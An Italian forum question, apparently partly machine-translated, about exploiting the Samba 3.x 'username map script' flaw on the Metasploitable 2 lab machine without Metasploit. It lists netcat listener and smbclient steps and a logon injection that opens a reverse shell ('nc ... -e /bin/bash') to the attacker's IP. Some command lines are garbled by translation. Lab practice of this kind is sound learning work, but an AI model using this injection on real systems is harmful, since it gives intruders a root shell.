Sto cercando di sfruttare Metasploitable 2 senza l'utilizzo di Metasploit, con l'obiettivo di imparare. In questo caso, mi sto concentrando su Samba 3.x (Port TCP 139, 445)
In questo link link vengono spiegati due metodi diversi per sfruttare questa macchina dopo che una scansione di nmap rivela le porte TCP 139 e 445 aperti, che eseguono Samba versione 3.x.
Il secondo metodo spiega che
This vulnerability takes advantage of the “username map script” functionality of Samba. There is no filtering of user input, so an attacker could connect to an SMB session, and use shell metacharacters as input for the username, causing the commands to be executed on the remote system. This could allow the attacker to gain a remote shell to the victim machine with root access.
Il mio problema si verifica quando si utilizza Metasploit, come in:
- link
- link
Ho finalmente trovato questo video link che evita Metasploit ma non funziona per me, dove segue (Kali = 192.168.200.1; Metasploitable2 = 192.168.200.130):
-
Nella finestra Terminal 1, impostiamo netcat per ascoltare:
netcat -nlvp 4444
-
Nella finestra Terminal 2, controlliamo la condivisione
smbclient -L //192.168.200.130
-
Ci concentriamo sulla cartella tmp e connettiamo (Terminal 2):
smbclient //192.168.200.130/tmp
-
Infine, otteniamo "smb: >" dove il comando "logon" è usato per invertire la connessione a Kali, come
smb: > accesso "/ =
nc 192.168.200.1 4444 -e /bin/bash
"
Questo ultimo punto non funziona per me con il seguente messaggio di errore "installazione della sessione fallita: NT_STATUS_NO_MEMORY".
È difficile per me trovare un buon manuale che spieghi il comando di "accesso". Ho provato a cambiare il modo in cui viene utilizzato netcat:
Al punto 1. Scrivo
smb: \> nc -nlvp 4444 -e /bin/bash
Al punto 4. Scrivo
smb: \> logon "/='nc 192.168.200.1 4444 -e /bin/bash'"
Stessi risultati. Lo stesso errore di messaggio.
Ho davvero provato a farlo da solo, ma non potevo. Ti sarei molto grato se potesse aiutarmi.
Grazie in anticipo !!